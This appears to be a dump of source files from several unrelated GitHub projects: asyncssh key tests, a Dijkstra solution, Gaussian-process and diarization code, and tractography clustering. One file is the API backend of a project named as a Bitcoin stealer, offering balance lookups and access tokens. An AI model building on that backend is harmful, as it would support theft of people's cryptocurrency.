self.privca.generate_user_certificate(\n self.pubkey, 'name', comment='user_comment')\n self.usercert.write_certificate('usercert')\n\n hostcert_sig_alg = self.privca.sig_algorithms[0].decode()\n self.hostcert = self.privca.generate_host_certificate(\n self.pubkey, 'name', sig_alg=hostcert_sig_alg,\n comment='host_comment')\n self.hostcert.write_certificate('hostcert')\n\n for f in ('priv', 'privca'):\n os.chmod(f, 0o600)\n\n self.assertEqual(self.privkey.get_algorithm(), alg_name)\n\n self.assertEqual(self.usercert.get_algorithm(),\n self.default_cert_version)\n\n if self.x509_supported:\n self.rootx509 = self.privca.generate_x509_ca_certificate(\n self.pubca, 'OU=root')\n\n self.rootx509.write_certificate('rootx509')\n\n self.userx509 = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root',\n comment='user_comment')\n\n self.assertEqual(self.userx509.get_algorithm(),\n 'x509v3-' + alg_name)\n\n self.userx509.write_certificate('userx509')\n\n self.hostx509 = self.privca.generate_x509_host_certificate(\n self.pubkey, 'OU=host', 'OU=root',\n comment='host_comment')\n\n self.hostx509.write_certificate('hostx509')\n\n self.otherx509 = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=other', 'OU=root')\n\n self.otherx509.write_certificate('otherx509')\n\n self.check_encode_errors()\n self.check_decode_errors()\n self.check_sshkey_base_errors()\n self.check_sign_and_verify()\n self.check_set_certificate()\n self.check_comment()\n\n if 'pkcs1' in self.private_formats:\n self.check_pkcs1_private()\n\n if 'pkcs1' in self.public_formats:\n self.check_pkcs1_public()\n\n if 'pkcs8' in self.private_formats: # pragma: no branch\n self.check_pkcs8_private()\n\n if 'pkcs8' in self.public_formats: # pragma: no branch\n self.check_pkcs8_public()\n\n self.check_openssh_private()\n self.check_openssh_public()\n self.check_openssh_certificate()\n\n self.check_rfc4716_public()\n self.check_rfc4716_certificate()\n\n self.check_certificate_options()\n\n for cert_type in (CERT_TYPE_USER, CERT_TYPE_HOST):\n self.check_certificate_errors(cert_type)\n\n if self.x509_supported:\n self.check_der_x509_certificate()\n self.check_pem_x509_certificate()\n self.check_openssh_x509_certificate()\n self.check_x509_certificate_errors()\n self.check_x509_certificate_subject()\n\n\nclass TestDSA(_TestPublicKey):\n \"\"\"Test DSA keys\"\"\"\n\n keyclass = 'dsa'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs1', 'pkcs8', 'openssh')\n public_formats = ('pkcs1', 'pkcs8', 'openssh', 'rfc4716')\n default_cert_version = 'ssh-dss-cert-v01@openssh.com'\n x509_supported = x509_available\n generate_args = (('ssh-dss', {}),)\n use_openssh = False\n\n\nclass TestRSA(_TestPublicKey):\n \"\"\"Test RSA keys\"\"\"\n\n keyclass = 'rsa'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs1', 'pkcs8', 'openssh')\n public_formats = ('pkcs1', 'pkcs8', 'openssh', 'rfc4716')\n default_cert_version = 'ssh-rsa-cert-v01@openssh.com'\n x509_supported = x509_available\n generate_args = (('ssh-rsa', {'key_size': 1024}),\n ('ssh-rsa', {'key_size': 2048}),\n ('ssh-rsa', {'key_size': 3072}),\n ('ssh-rsa', {'exponent': 3}))\n\n\nclass TestECDSA(_TestPublicKey):\n \"\"\"Test ECDSA keys\"\"\"\n\n keyclass = 'ec'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs1', 'pkcs8', 'openssh')\n public_formats = ('pkcs8', 'openssh', 'rfc4716')\n x509_supported = x509_available\n generate_args = (('ecdsa-sha2-nistp256', {}),\n ('ecdsa-sha2-nistp384', {}),\n ('ecdsa-sha2-nistp521', {}))\n\n @property\n def default_cert_version(self):\n \"\"\"Return default SSH certificate version\"\"\"\n\n return self.privkey.algorithm.decode('ascii') + '-cert-v01@openssh.com'\n\n\n@unittest.skipUnless(ed25519_available, 'ed25519 not available')\nclass TestEd25519(_TestPublicKey):\n \"\"\"Test Ed25519 keys\"\"\"\n\n keyclass = 'ed25519'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs8', 'openssh')\n public_formats = ('pkcs8', 'openssh', 'rfc4716')\n x509_supported = x509_available\n default_cert_version = 'ssh-ed25519-cert-v01@openssh.com'\n generate_args = (('ssh-ed25519', {}),)\n single_cipher = False\n use_openssh = False\n use_openssl = _openssl_supports_pkey\n\n\n@unittest.skipUnless(ed448_available, 'ed448 not available')\nclass TestEd448(_TestPublicKey):\n \"\"\"Test Ed448 keys\"\"\"\n\n keyclass = 'ed448'\n base_format = 'pkcs8-pem'\n private_formats = ('pkcs8', 'openssh')\n public_formats = ('pkcs8', 'openssh', 'rfc4716')\n x509_supported = x509_available\n default_cert_version = 'ssh-ed448-cert-v01@openssh.com'\n generate_args = (('ssh-ed448', {}),)\n use_openssh = False\n use_openssl = _openssl_supports_pkey\n\n\n@unittest.skipUnless(sk_available, 'security key support not available')\nclass TestSKECDSA(_TestPublicKey):\n \"\"\"Test U2F ECDSA keys\"\"\"\n\n keyclass = 'sk-ecdsa'\n base_format = 'openssh'\n private_formats = ('openssh',)\n public_formats = ('openssh',)\n generate_args = (('sk-ecdsa-sha2-nistp256@openssh.com', {}),)\n use_openssh = False\n\n def setUp(self):\n \"\"\"Set up ECDSA security key test\"\"\"\n\n super().setUp()\n self.addCleanup(unstub_sk, *stub_sk([1]))\n\n @property\n def default_cert_version(self):\n \"\"\"Return default SSH certificate version\"\"\"\n\n return self.privkey.algorithm.decode('ascii')[:-12] + \\\n '-cert-v01@openssh.com'\n\n\n@unittest.skipUnless(sk_available, 'security key support not available')\n@unittest.skipUnless(ed25519_available, 'ed25519 not available')\nclass TestSKEd25519(_TestPublicKey):\n \"\"\"Test U2F Ed25519 keys\"\"\"\n\n keyclass = 'sk-ed25519'\n base_format = 'openssh'\n private_formats = ('openssh',)\n public_formats = ('openssh',)\n default_cert_version = 'sk-ssh-ed25519-cert-v01@openssh.com'\n generate_args = (('sk-ssh-ed25519@openssh.com', {}),)\n use_openssh = False\n\n def setUp(self):\n \"\"\"Set up Ed25519 security key test\"\"\"\n\n super().setUp()\n self.addCleanup(unstub_sk, *stub_sk([2]))\n\n\ndel _TestPublicKey\n\n\nclass _TestPublicKeyTopLevel(TempDirTestCase):\n \"\"\"Top-level public key module tests\"\"\"\n\n def test_public_key(self):\n \"\"\"Test public key top-level functions\"\"\"\n\n self.assertIsNotNone(get_public_key_algs())\n self.assertIsNotNone(get_certificate_algs())\n self.assertEqual(bool(get_x509_certificate_algs()), x509_available)\n\n def test_public_key_algorithm_mismatch(self):\n \"\"\"Test algorithm mismatch in SSH public key\"\"\"\n\n privkey = get_test_key('ssh-rsa')\n keydata = privkey.export_public_key('openssh')\n keydata = b'ssh-dss ' + keydata.split(None, 1)[1]\n\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_public_key(keydata)\n\n write_file('list', keydata)\n\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.read_public_key_list('list')\n\n def test_pad_error(self):\n \"\"\"Test for missing RFC 1423 padding on PBE decrypt\"\"\"\n\n with self.assertRaises(asyncssh.KeyEncryptionError):\n pkcs1_decrypt(b'', b'AES-128-CBC', os.urandom(16), 'x')\n\n def test_ec_explicit(self):\n \"\"\"Test EC certificate with explicit parameters\"\"\"\n\n if _openssl_available: # pragma: no branch\n for curve in ('secp256r1', 'secp384r1', 'secp521r1'):\n with self.subTest('Import EC key with explicit parameters',\n curve=curve):\n run('openssl ecparam -out priv -noout -genkey -name %s '\n '-param_enc explicit' % curve)\n asyncssh.read_private_key('priv')\n\n @unittest.skipIf(not _openssl_available, \"openssl isn't available\")\n @unittest.skipIf(b'secp224r1' not in _openssl_curves,\n \"this openssl doesn't support secp224r1\")\n def test_ec_explicit_unknown(self):\n \"\"\"Import EC key with unknown explicit parameters\"\"\"\n\n run('openssl ecparam -out priv -noout -genkey -name secp224r1 '\n '-param_enc explicit')\n\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.read_private_key('priv')\n\n def test_generate_errors(self):\n \"\"\"Test errors in private key and certificate generation\"\"\"\n\n for alg_name, kwargs in (('xxx', {}),\n ('ssh-dss', {'xxx': 0}),\n ('ssh-rsa', {'xxx': 0}),\n ('ecdsa-sha2-nistp256', {'xxx': 0}),\n ('ssh-ed25519', {'xxx': 0}),\n ('ssh-ed448', {'xxx': 0})):\n with self.subTest(alg_name=alg_name, **kwargs):\n with self.assertRaises(asyncssh.KeyGenerationError):\n asyncssh.generate_private_key(alg_name, **kwargs)\n\n privkey = get_test_key('ssh-rsa')\n pubkey = privkey.convert_to_public()\n privca = get_test_key('ssh-rsa', 1)\n\n with self.assertRaises(asyncssh.KeyGenerationError):\n privca.generate_user_certificate(pubkey, 'name', version=0)\n\n with self.assertRaises(ValueError):\n privca.generate_user_certificate(pubkey, 'name', valid_after=())\n\n with self.assertRaises(ValueError):\n privca.generate_user_certificate(pubkey, 'name', valid_after='xxx')\n\n with self.assertRaises(ValueError):\n privca.generate_user_certificate(pubkey, 'name', valid_after='now',\n valid_before='-1m')\n\n with self.assertRaises(ValueError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user',\n valid_after=())\n\n with self.assertRaises(ValueError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user',\n valid_after='xxx')\n\n with self.assertRaises(ValueError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user',\n valid_after='now',\n valid_before='-1m')\n\n privca.x509_algorithms = None\n\n with self.assertRaises(asyncssh.KeyGenerationError):\n privca.generate_x509_user_certificate(pubkey, 'OU=user')\n\n def test_rsa_encrypt_error(self):\n \"\"\"Test RSA encryption error\"\"\"\n\n privkey = get_test_key('ssh-rsa', 2048)\n pubkey = privkey.convert_to_public()\n\n self.assertIsNone(pubkey.encrypt(os.urandom(256), pubkey.algorithm))\n\n def test_rsa_decrypt_error(self):\n \"\"\"Test RSA decryption error\"\"\"\n\n privkey = get_test_key('ssh-rsa', 2048)\n\n self.assertIsNone(privkey.decrypt(b'', privkey.algorithm))\n\n @unittest.skipUnless(x509_available, 'x509 not available')\n def test_x509_certificate_hashes(self):\n \"\"\"Test X.509 certificate hash algorithms\"\"\"\n\n privkey = get_test_key('ssh-rsa')\n pubkey = privkey.convert_to_public()\n\n for hash_alg in ('sha256', 'sha512'):\n cert = privkey.generate_x509_user_certificate(\n pubkey, 'OU=user', hash_alg=hash_alg)\n\n cert.write_certificate('cert', 'pem')\n\n cert2 = asyncssh.read_certificate('cert')\n self.assertEqual(str(cert2.subject), 'OU=user')\n","repo_name":"ronf/asyncssh","sub_path":"tests/test_public_key.py","file_name":"test_public_key.py","file_ext":"py","file_size_in_byte":99405,"program_lang":"python","lang":"en","doc_type":"code","stars":1408,"dataset":"github-code","pt":"6"} +{"seq_id":"3926158","text":"import heapq\nimport sys\nINF = int(1e9)\n\n\ndef dijkstra(st):\n queue = []\n heapq.heappush(queue, (0, st))\n while queue:\n dist, now = heapq.heappop(queue)\n if visited[now]:\n continue\n visited[now] = True\n for now_dist, now_dest in graph[now]:\n if distance[now_dest] < now_dist + dist:\n continue\n dist_update = now_dist + dist\n heapq.heappush(queue, (dist_update, now_dest))\n distance[now_dest] = dist_update\n\n\nvertex, edges = (int(i) for i in sys.stdin.readline().split())\ngraph = [[] for _ in range(vertex + 1)]\nfor _ in range(edges):\n start, dest, dis = (int(i) for i in sys.stdin.readline().split())\n graph[start].append([dis, dest])\n\nanswer = []\ncnt = [[] for _ in range(vertex + 1)]\n# 돌아갈 수 없는 곳 체크\nfor i in range(1, vertex + 1):\n visited = [False] * (vertex + 1)\n for idx, j in enumerate(cnt):\n if i in j:\n visited[idx] = True\n distance = [INF] * (vertex + 1)\n dijkstra(i)\n for idx, j in enumerate(distance):\n if j == INF:\n cnt[i].append(idx)\n answer.append(distance[i])\nif min(answer) == INF:\n print(-1)\nelse:\n print(min(answer))","repo_name":"Winmini/CodingTest","sub_path":"BOJ/1956 - pypy3로 통과.py","file_name":"1956 - pypy3로 통과.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"69863483389","text":"from nltk.tokenize import TweetTokenizer\nfrom datetime import datetime\nfrom helper.variable import sports\nfrom helper.clean_data import convert_time_to_each10s\nfrom streaming.events import Sports\n\n\ndef clean_data_from_tweet(tweets):\n football = 0\n all_sports = 0\n for tweet in tweets:\n sport = \"Unknown\"\n # split text to list of words\n words = TweetTokenizer().tokenize(tweet.text)\n for word in words:\n # get subject sport in text\n if word.lower() in sports:\n sport = word.lower()\n break\n if sport == 'football':\n football += 1\n all_sports += 1\n time = convert_time_to_each10s(datetime.utcnow())\n sports_in_period = Sports(time=time, football=football, all_sports=all_sports)\n print('Send to analyze:')\n return sports_in_period\n\n\ndef count_sports(event, football, sports):\n curr = convert_time_to_each10s(datetime.utcnow())\n # if current == time of event\n if curr == event.time:\n # update last 10 period time\n for i in range(9, 0, -1):\n football[i] = football[i - 1]\n sports[i] = sports[i - 1]\n football[0] = event.football\n sports[0] = event.all_sports\n print('a period = 10 seconds')\n print('last_10_period_football: ', football)\n print('last_10_period_sports: ', sports)\n print('___end___stage___')\n return [football, sports]\n","repo_name":"lhlvu1999/stream_twitter","sub_path":"streaming/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43005459158","text":"\"\"\"\nFully Independent Training Conditional(FITC) sparse Gaussian process. See Snelson and Ghahraman, 2006.\n\"\"\"\nimport torch\nfrom sgpr import SGPR\nfrom linalg import stable_cholesky, triangular_solve, stable_divide, LOG_2PI, stable_sqrt\nfrom torch.functional import F\n\n\nclass SGPR_FITC(SGPR):\n def __init__(self, Xm, Xn, yn, kernel, variance=None):\n \"\"\"\n :param Xm: Inducing inputs.\n :type Xm: torch.tensor [m, d]\n \"\"\"\n super(SGPR_FITC, self).__init__(Xm, kernel, variance)\n self.Xn = Xn\n self.yn = yn\n\n def forward(self, Xt, diag=False):\n Kmm = self.kernel(self.inducing)\n Kmn = self.kernel(self.inducing, self.Xn)\n Ktm = self.kernel(Xt, self.inducing)\n Knn = self.kernel(self.Xn, diag=True)\n variance = F.softplus(self.free_variance)\n Lm = stable_cholesky(Kmm)\n LiUT = triangular_solve(Kmn, Lm)\n sigma_star = Knn.squeeze() + variance - torch.sum(LiUT ** 2, 0)\n sigma_star_sqrt_inv = stable_sqrt(stable_divide(1., sigma_star))\n\n Lmi_Kmn = LiUT\n sigma_Knm_Lmi = sigma_star_sqrt_inv.reshape(-1, 1) * Lmi_Kmn.t()\n woodbury_chol = stable_cholesky(\n torch.eye(self.inducing.size(0), device=Xt.device) + sigma_Knm_Lmi.t() @ sigma_Knm_Lmi)\n\n Lmi_Kmt = triangular_solve(Ktm.t(), Lm)\n left = triangular_solve(Lmi_Kmt, woodbury_chol)\n tmp = sigma_Knm_Lmi.t() @ (sigma_star_sqrt_inv.unsqueeze(-1) * self.yn)\n right = triangular_solve(tmp, woodbury_chol)\n mean = left.t() @ right\n\n if diag:\n # do sth\n Ktt_diag = self.kernel(Xt, diag=True)\n tmp = triangular_solve(Lmi_Kmt, woodbury_chol)\n var = Ktt_diag - torch.sum(Lmi_Kmt ** 2, dim=0).unsqueeze(-1) + torch.sum(tmp ** 2, dim=0).unsqueeze(-1)\n return mean, var\n else:\n Ktt = self.kernel(Xt, Xt)\n tmp = triangular_solve(Lmi_Kmt, woodbury_chol)\n cov = Ktt - Lmi_Kmt.t() @ Lmi_Kmt + tmp.t() @ tmp\n return mean, cov\n\n def loss(self):\n # directly copy GPy implementation\n num_inducing = self.inducing.size(0)\n num_data = self.yn.size(0)\n\n variance = F.softplus(self.free_variance)\n Kmm = self.kernel(self.inducing)\n Knn = self.kernel(self.Xn, diag=True)\n Knm = self.kernel(self.Xn, self.inducing)\n U = Knm\n\n Lm = stable_cholesky(Kmm)\n LiUT = triangular_solve(U.t(), Lm)\n\n sigma_star = Knn.squeeze() + variance - torch.sum(LiUT ** 2, 0)\n beta = stable_divide(1., sigma_star)\n\n tmp = LiUT * torch.sqrt(beta)\n A = tmp @ tmp.t() + torch.eye(num_inducing, device=self.device)\n LA = stable_cholesky(A)\n\n URiy = (U.t() * beta) @ self.yn\n tmp = triangular_solve(URiy, Lm)\n b = triangular_solve(tmp, LA)\n\n loss = 0.5 * num_data * LOG_2PI + torch.sum(torch.log(torch.diag(LA))) - 0.5 * torch.sum(\n torch.log(beta)) + 0.5 * torch.sum((self.yn.t() * torch.sqrt(beta)) ** 2) - 0.5 * torch.sum(b ** 2)\n return loss\n","repo_name":"weiyadi/dlm_sgp","sub_path":"conjugate/sgpr_fitc.py","file_name":"sgpr_fitc.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"3013431024","text":"import sys\r\nimport re\r\nfrom time import sleep\r\nfrom bitcoin import *\r\ntry: # if is python3\r\n from urllib.request import urlopen\r\nexcept: # if is python2\r\n from urllib2 import urlopen\r\nfrom fastapi import FastAPI, Depends\r\nimport random\r\nfrom datetime import datetime\r\nimport json\r\nimport requests\r\n\r\n\r\ns = requests.Session()\r\n\r\napp = FastAPI()\r\n\r\n\r\ntimes = datetime.now()\r\ndt_string = times.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n\r\n\r\n\r\nzero = \"[{}]\"\r\n\r\n\r\n\r\nclass status():\r\n status: str\r\n\r\nwith open(\"status.json\", \"r\") as f:\r\n current_status = json.load(f)['status']\r\n\r\n@app.get('/beta/status')\r\ndef get_status():\r\n with open(\"status.json\", \"r\") as f:\r\n current_status = json.load(f)['status']\r\n return current_status\r\n\r\n@app.get(\"/version/{version}\")\r\ndef version(version : int):\r\n return \"Check for Updates!\" if version < 2 else \"Lastest Version Installed!\"\r\n\r\n\r\n@app.get('/beta/check/{address}')\r\ndef check_balance(address: str):\r\n try:\r\n wallet = s.get(f\"https://api-r.bitcoinchain.com/v1/address/{address}\", stream = True)\r\n response = wallet.json()\r\n return 0 if zero in response else response\r\n except:\r\n return(\"Could not Request Server! API's ARE DOWN!\")\r\n\r\n\r\n \r\n@app.get('/auth/add/{token}')\r\ndef authadd(token: str):\r\n with open('tokens.json', 'r') as f:\r\n tokens = json.load(f)\r\n tokens[str(f\"{token}\")] = f\"{token}\"\r\n with open('tokens.json', 'w') as f:\r\n json.dump(tokens, f)\r\n return(\"Done!\")\r\n \r\n@app.get('/auth/remove/{token}')\r\ndef removeauth(token: str):\r\n with open('tokens.json', 'r') as f:\r\n tokens = json.load(f)\r\n tokens.pop(str(f\"{token}\"))\r\n with open('tokens.json', 'w') as f:\r\n json.dump(tokens, f)\r\n return(\"Done!\")\r\n \r\n@app.get('/auth/check/{token}')\r\ndef authcheck(token: str):\r\n with open('tokens.json', 'r') as f:\r\n tokens = json.load(f)\r\n return token in tokens","repo_name":"LopeKinz/BTC_MULTI_","sub_path":"BTC_STEALER_CLIENT/API/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"32180159474","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport subprocess as sp\nimport os\nfrom hierarchical import clusterTools as CT\nimport time\nimport numpy as np\nimport read_write_bundle as rb\n\ndef Hierarchical(raw_tractography,MatrixDist_output, affinities_graph_output,MaxDistance_Threshold,dendogram_output):\n \"\"\"\n Run to Hierarchical clustering.\n\n \"\"\"\n # Step1. Distance Matrix\n t0= time.time()\n sp.run([\"./hierarchical/fiberDistanceMax\", raw_tractography, MatrixDist_output],check = True)\n print(\"Distance Matrix Delay: \", time.time()-t0, \"[s]\")\n\n # Step2. Affinities Graph\n t0= time.time()\n sp.run([\"./hierarchical/getAffinityGraphFromDistanceMatrix\", MatrixDist_output, affinities_graph_output, MaxDistance_Threshold])\n print(\"Affinities Graph Delay: \", time.time()-t0, \"[s]\")\n \n # Step3. Dendogram \n t0= time.time()\n sp.run([\"./hierarchical/getAverageLinkHCFromGraphFile\",affinities_graph_output,dendogram_output])\n print(\"Dendogram Delay: \", time.time()-t0, \"[s]\")\n \n\n#%% Example Hierarchical Clustering\n\nprint(\"---Example Hierarchical Clustering---\")\n \ndir_raw_tractography=\"../data/118225_MNI_21p_sub.bundles\" # input format: \".bundles\" \n\nMatrixDist_output=\"../data/hierarch/matrixd.bin\" # output format: \".bin\" \n\naffinities_graph_output=\"../data/hierarch/affin.txt\"\n\nMaxDistance_Threshold=\"40\" # variable threshold \n\ndendogram_output=\"../data/hierarch/dendogram.txt\"\n\nt0= time.time()\n\nHierarchical(dir_raw_tractography,MatrixDist_output, affinities_graph_output,MaxDistance_Threshold,dendogram_output)\n\nprint(\"Hierarchical Delay: \", time.time()-t0, \"[s]\")\n\n#%% Function and Example Particional Hierarchical Clustering\n\ndef Particional_Hierarchical(maxdist,var,arbfile,afffile,partfile):\n \n \"\"\"\n Returns a \".txt\" file with the detected clusters, where each list is a cluster. \n maxdist, 30 or 40mmm is recommended\n var = 3600 ##minimum affinity within a cluster => # N.exp( -max_cldist * max_cldist / var)\n \"\"\"\n \n wfv=CT.wforest_partition_maxdist_from_graph( arbfile,maxdist,True,afffile,var)\n \n clusteres=wfv.clusters\n \n ar=open(partfile,'wt')\n ar.write(str(clusteres))\n ar.close()\n\n\n#Example Particional Hierarchical Clustering\nprint(\"---Example Particional Hierarchical Clustering---\")\n\nmaxdist=30 \nvar = 3600 \narbfile=\"../data/hierarch/dendogram.txt\"\nafffile=\"../data/hierarch/affin.txt\"\npartfile=\"../data/hierarch/particion_\"+str(maxdist)+\".txt\"\n\nParticional_Hierarchical(maxdist,var,arbfile,afffile,partfile)\n\n#%% Function Retrieve clusters of fibers for Hierarchical clustering\n\ndef Write_Retrieve_clusters(d_result,wfv):\n\n \"\"\"\n Return the clusters in the directory, d_result \n \"\"\" \n list_clusters=wfv.clusters\n \n raw_tractography = np.array(rb.read_bundle(dir_raw_tractography))\n \n for clus in range(len(list_clusters)):\n if not os.path.exists(d_result+\"/\"):\n os.mkdir(d_result+\"/\")\n \n rb.write_bundle(d_result+\"/\"+str(clus)+\".bundles\",raw_tractography[list_clusters[clus]])\n\n#%% Example Retrieve clusters of fibers for Hierarchical clustering\n \nprint(\"---Example Retrieve clusters of fibers for Hierarchical clustering---\") \n \nd_result = \"../data/hierarch/result\"\nwfv=CT.wforest_partition_maxdist_from_graph( arbfile,maxdist,True,afffile,var)\nWrite_Retrieve_clusters(d_result,wfv)\n\n\n","repo_name":"GonzaloSabat/phybers","sub_path":"phybers/src/hclust/Clustering.py","file_name":"Clustering.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4699523027","text":"import os\nimport numpy as np\nfrom functools import partial\nimport torch\nfrom eend.feature import get_input_dim\nfrom eend.pytorch_backend.models import fix_state_dict\nfrom eend.pytorch_backend.models import PadertorchModel\nfrom eend.pytorch_backend.models import TransformerDiarization\nfrom eend.pytorch_backend.transformer import NoamScheduler\nfrom eend.pytorch_backend.diarization_dataset \\\n import DiarizationDatasetFromWave, DiarizationDatasetFromFeat\nimport padertorch as pt\nimport padertorch.train.optimizer as pt_opt\nfrom eend import feature\nfrom eend import kaldi_data\nimport yamlargparse\n\nparser = yamlargparse.ArgumentParser(description='training')\nparser.add_argument('-c', '--config', help='config file path',\n action=yamlargparse.ActionConfigFile)\nparser.add_argument('train_data_dir',\n help='kaldi-style data dir used for training.')\nparser.add_argument('valid_data_dir',\n help='kaldi-style data dir used for validation.')\nparser.add_argument('model_save_dir',\n help='output directory which model file will be saved in.')\nparser.add_argument('--initmodel', '-m', default='',\n help='Initialize the model from given file')\nparser.add_argument('--spkv-lab', default='',\n help='file path of speaker vector with label and\\\n speaker ID conversion table for adaptation')\n\n# The following arguments are set in conf/train.yaml or conf/adapt.yaml\nparser.add_argument('--spk-loss-ratio', default=0.03, type=float)\nparser.add_argument('--spkv-dim', default=256, type=int,\n help='dimension of speaker embedding vector')\nparser.add_argument('--max-epochs', default=100, type=int,\n help='Max. number of epochs to train')\nparser.add_argument('--input-transform', default='logmel23_mn',\n choices=['', 'log', 'logmel', 'logmel23', 'logmel23_mn',\n 'logmel23_mvn', 'logmel23_swn'],\n help='input transform')\nparser.add_argument('--lr', default=0.001, type=float)\nparser.add_argument('--optimizer', default='noam', type=str)\nparser.add_argument('--num-speakers', default=3, type=int)\nparser.add_argument('--gradclip', default=5, type=int,\n help='gradient clipping. if < 0, no clipping')\nparser.add_argument('--chunk-size', default=150, type=int,\n help='number of frames in one utterance')\nparser.add_argument('--batchsize', default=64, type=int,\n help='number of utterances in one batch.\\\n Note that real batchsize = number of gpu *\\\n batchsize-per-gpu * batchsize')\nparser.add_argument('--num-workers', default=8, type=int)\nparser.add_argument('--hidden-size', default=256, type=int)\nparser.add_argument('--context-size', default=7, type=int)\nparser.add_argument('--subsampling', default=10, type=int)\nparser.add_argument('--frame-size', default=200, type=int)\nparser.add_argument('--frame-shift', default=80, type=int)\nparser.add_argument('--sampling-rate', default=8000, type=int)\nparser.add_argument('--noam-scale', default=1.0, type=float)\nparser.add_argument('--noam-warmup-steps', default=25000, type=float)\nparser.add_argument('--transformer-encoder-n-heads', default=8, type=int)\nparser.add_argument('--transformer-encoder-n-layers', default=6, type=int)\nparser.add_argument('--transformer-encoder-dropout', default=0.1, type=float)\nparser.add_argument('--seed', default=777, type=int)\nparser.add_argument('--feature-nj', default=100, type=int,\n help='maximum number of subdirectories to store\\\n featlab_XXXXXXXX.npy')\nparser.add_argument('--batchsize-per-gpu', default=16, type=int,\n help='virtual_minibatch_size in padertorch')\nparser.add_argument('--test-run', default=0, type=int, choices=[0, 1],\n help='padertorch test run switch; 1 is on, 0 is off')\n\nargs = parser.parse_args()\nprint(args)\n\ndef _count_frames(data_len, size, step):\n return int((data_len - size + step) / step)\n\n\ndef _gen_frame_indices(data_length, size=2000, step=2000):\n i = -1\n for i in range(_count_frames(data_length, size, step)):\n yield i * step, i * step + size\n\n if i * step + size < data_length:\n if data_length - (i + 1) * step > 0:\n if i == -1:\n yield (i + 1) * step, data_length\n else:\n yield data_length - size, data_length\n\nclass DiarizationDatasetFromWaveTest(torch.utils.data.Dataset):\n def __init__(\n self,\n data_dir,\n dtype=np.float32,\n chunk_size=2000,\n context_size=0,\n frame_size=1024,\n frame_shift=256,\n subsampling=1,\n rate=16000,\n input_transform=None,\n n_speakers=None,\n ):\n self.data_dir = data_dir\n self.dtype = dtype\n self.chunk_size = chunk_size\n self.context_size = context_size\n self.frame_size = frame_size\n self.frame_shift = frame_shift\n self.subsampling = subsampling\n self.rate = rate\n self.input_transform = input_transform\n self.n_speakers = n_speakers\n\n self.chunk_indices = []\n self.data = kaldi_data.KaldiData(self.data_dir)\n self.all_speakers = sorted(self.data.spk2utt.keys())\n self.all_n_speakers = len(self.all_speakers)\n self.all_n_speakers_arr =\\\n np.arange(self.all_n_speakers,\n dtype=np.int64).reshape(self.all_n_speakers, 1)\n\n # Make chunk indices: filepath, start_frame, end_frame\n # for rec in self.data.wavs:\n # data_len = int(self.data.reco2dur[rec] * self.rate / frame_shift)\n # data_len = int(data_len / self.subsampling)\n # for st, ed in _gen_frame_indices(data_len, chunk_size, chunk_size):\n # self.chunk_indices.append(\n # (rec, st * self.subsampling, ed * self.subsampling))\n for i,rec in enumerate(self.data.wavs):\n self.chunk_indices.append([])\n data_len = int(self.data.reco2dur[rec] * self.rate / frame_shift)\n data_len = int(data_len / self.subsampling)\n for st, ed in _gen_frame_indices(data_len, chunk_size, chunk_size):\n self.chunk_indices[i].append(\n (rec, st * self.subsampling, ed * self.subsampling)\n )\n print(len(self.chunk_indices), \" chunks\")\n\n def __len__(self):\n return len(self.chunk_indices)\n\n def __getitem__(self, i):\n # rec, st, ed = self.chunk_indices[i]\n # filtered_segments = self.data.segments[rec]\n # # speakers: the value given from data\n # speakers = np.unique(\n # [self.data.utt2spk[seg['utt']] for seg in filtered_segments]\n # ).tolist()\n # n_speakers = self.n_speakers\n # if self.n_speakers < len(speakers):\n # n_speakers = len(speakers)\n\n # Y, T = feature.get_labeledSTFT(\n # self.data,\n # rec,\n # st,\n # ed,\n # self.frame_size,\n # self.frame_shift,\n # n_speakers,\n # )\n # T = T.astype(np.float32)\n\n # S_arr = -1 * np.ones(n_speakers).astype(np.int64)\n # for seg in filtered_segments:\n # speaker_index = speakers.index(self.data.utt2spk[seg['utt']])\n # all_speaker_index = self.all_speakers.index(\n # self.data.utt2spk[seg['utt']])\n # S_arr[speaker_index] = all_speaker_index\n\n # # If T[:, n_speakers - 1] == 0.0, then S_arr[n_speakers - 1] == -1,\n # # so S_arr[n_speakers - 1] is not used for training,\n # # e.g., in the case of training 3-spk model with 2-spk data\n\n # Y = feature.transform(Y, self.input_transform)\n # Y_spliced = feature.splice(Y, self.context_size)\n # Y_ss, T_ss = feature.subsample(Y_spliced, T, self.subsampling)\n # ilen = np.array(Y_ss.shape[0], dtype=np.int64)\n\n # return Y_ss, T_ss, S_arr, self.all_n_speakers_arr, ilen\n rec_list = self.chunk_indices[i]\n wav_data_list = []\n\n for rec, st, ed in rec_list:\n filtered_segments = self.data.segments[rec]\n # speakers: the value given from data\n speakers = np.unique(\n [self.data.utt2spk[seg['utt']] for seg in filtered_segments]\n ).tolist()\n n_speakers = self.n_speakers\n if self.n_speakers < len(speakers):\n n_speakers = len(speakers)\n\n Y, T = feature.get_labeledSTFT(\n self.data,\n rec,\n st,\n ed,\n self.frame_size,\n self.frame_shift,\n n_speakers,\n )\n T = T.astype(np.float32)\n\n S_arr = -1 